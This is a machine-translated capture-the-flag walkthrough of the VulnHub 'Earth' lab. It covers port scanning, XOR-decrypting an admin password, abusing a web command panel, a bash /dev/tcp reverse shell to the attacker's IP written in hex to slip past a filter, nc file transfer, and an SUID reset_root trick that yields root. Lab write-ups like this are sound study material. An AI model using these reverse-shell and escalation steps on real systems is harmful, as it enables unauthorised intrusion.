vulnhub shooting range - the planes: Earth



Attacker: kali

Target: the planes: Earth NAT network segment

Download connection


Information collection and utilization

Host discovery

As shown in the figure, use python script to scan the IP address.

Port scan

nmap -O -sV -p- -A -oN earth_namp.txt

As shown in the figure, three ports are open, 22, 80443, and both 80 and 443 are Python 3 9 composition


As shown in the figure, open it directly as Bad Request(400). At this time, pay attention to the namp scanning results:

You can see two DNS records, so you need to manually modify the / etc/hosts information.

windows: C:\Windows\System32\dirvers\etc\hosts

Linux: /etc/hosts

ipconfig /flushdns

Refresh DNS cache

At this point, you can access the page normally




Directory scan

python3 -u https://earth.local/

python3 -u

Visit one by one

This plug-in can be seen as Django

Guess whether the DEBUG mode is turned on. Enter the url casually and display Not Found, which proves that the DEBUG mode is turned off.

Is there Django here? The robots protocol * is unknown and cannot be accessed. The last one is testcognos* Guess the following when the suffix is txt

Precautions for testing secure messaging system:

\*use XOR As an algorithm, encryption should be combined with RSA As safe as used in.

\*Earth has confirmed that they have received the message we sent.

\*testdata.txt Used to test encryption.

**\*terra The user name used as the administrator portal.**

**To do list:**

**\*How can we safely deliver our monthly keys to the earth? Or should we change our keys every week?**

**\*Different key lengths need to be tested to prevent violence. How long should the key be kept?**

**\*The messaging interface and the management panel interface need to be improved, which is very basic at present.

According to radiometric dating estimates and other evidence, the earth was formed 4.5 billion years ago. In the first billion years of earth's history, life appeared in the ocean and began to affect the earth's atmosphere and surface, leading to the diffusion of anaerobic organisms and later aerobic organisms. Some geological evidence suggests that life may have existed as early as 4.1 billion years ago.

From the above, we can know the following information:

1. terra Is the administrator user name
2. use XOR (Exclusive or operation
3. You need to change the name of the home page   Previous Messages And testdata.txt Do XOR operation and decrypt.
4. do CTF Yes 🤣


import binascii
c = "2402111b1a0705070a41000a431a000a0e0a0f04104601164d050f070c0f15540d1018000000000c0c06410f0901420e105c0d074d04181a01041c170d4f4c2c0c13000d430e0e1c0a0006410b420d074d55404645031b18040a03074d181104111b410f000a4c41335d1c1d040f4e070d04521201111f1d4d031d090f010e00471c07001647481a0b412b1217151a531b4304001e151b171a4441020e030741054418100c130b1745081c541c0b0949020211040d1b410f090142030153091b4d150153040714110b174c2c0c13000d441b410f13080d12145c0d0708410f1d014101011a050d0a084d540906090507090242150b141c1d08411e010a0d1b120d110d1d040e1a450c0e410f090407130b5601164d00001749411e151c061e454d0011170c0a080d470a1006055a010600124053360e1f1148040906010e130c00090d4e02130b05015a0b104d0800170c0213000d104c1d050000450f01070b47080318445c090308410f010c12171a48021f49080006091a48001d47514c50445601190108011d451817151a104c080a0e5a"

m = "According to radiometric dating estimation and other evidence, Earth formed over 4.5 billion years ago. Within the first billion years of Earth's history, life appeared in the oceans and began to affect Earth's atmosphere and surface, leading to the proliferation of anaerobic and, later, aerobic organisms. Some geological evidence indicates that life may have arisen as early as 4.1 billion years ago."

m = binascii.b2a\_hex(m.encode("utf-8"))

result = hex(int(c,16) ^ int(m,16))


Online hex to character

Results obtained:


Found all duplicates: Earth climate change bad4humans

Therefore, the account and password are obtained:



As shown in the figure, the login is successful and comes to a command execution interface

Enter id;ls shows that it is an apache user and displays the contents in the root directory. According to vulnhub's Description: there are two flags on the box: a user and root flag which includes an MD5 hash

flag 1

It can be seen that there are two flag s, namely user and root

Enter find / -name "* flag *" to find the flag in / var/earth_web/user_flag.txt

As shown in the figure, we get the first flag. According to the description, the second flag is located in the root directory, so we have to get the root permission by raising the right to view it.


bash -i >& /dev/tcp/ 0>&1

As shown in the figure: remote connection prohibited.

After reading the article of the boss, it is said that the IP address can be converted into hexadecimal. I don't know why. Copy it! Remember this technique.

bash -i >& /dev/tcp/0xac.0x1f.0xa0.0x2f/4444 0>&1

OK, I got the shell. Next, I'll raise the right and collect information first
cat /etc/passwd

As shown in the figure, only two users have / bin / bash: root and earth

uname -a



SUID right raising

find / -perm -u=s -type f 2>/dev/null

As shown in the figure, / usr/bin/reset_root is likely to get root permission.

Direct operation

Check for reset triggers

Reset failed, all triggers do not exist

As expected, it failed.

It can't be debugged on the drone aircraft. This command can be downloaded to debug in kali, and download can transfer files by nc.

Start at kali / receiver first:

nc -l 5555 > reset_root

Then start on the target / sender
nc 5555 < /usr/bin/reset_root

You can see the instant completion.

Now reset_root has been downloaded and can be debugged. Here we need to learn a new command: strace

If you don't have this command, you can install it first.

Reset before use_ Root gives execution permission
chmod +x reset_root

strace ./reset_root

From the returned results, we can see that there are three No such file or directory

access("/dev/shm/kHgTFI5G", F\_OK)       = -1 ENOENT (No such file or directory)

access("/dev/shm/Zw7bV9U5", F\_OK)       = -1 ENOENT (No such file or directory)

access("/tmp/kcM0Wewe", F\_OK)           = -1 ENOENT (No such file or directory)

Then, it may fail because there are no three files on the target, so let's create these three files on the target. What are the contents of the files? No one knows if there is any content. First check whether the target has these three files. If not, create them and then run them.

As shown in the figure, there is really no strace command. It's awesome.

Create and run

From the returned result, you can see: resetting root password to: Earth. Change the password of root user to earth

Switch root

As shown in the figure, it is now root.

flag 2


  1. The difficulty lies in password cracking. The password is obtained by XOR operation according to plaintext and ciphertext.
  2. Newly learned nc can be used to transfer files.
  3. New learned strace command, very powerful.
  4. bash -i >& /dev/tcp/0xac. 0x1f. 0xa0. 0x2F / 4444 0 > & 1 can convert the ip address to hexadecimal, learned.

Keywords: Linux Web Security security hole

Added by pureDesi on Sat, 12 Feb 2022 12:46:46 +0200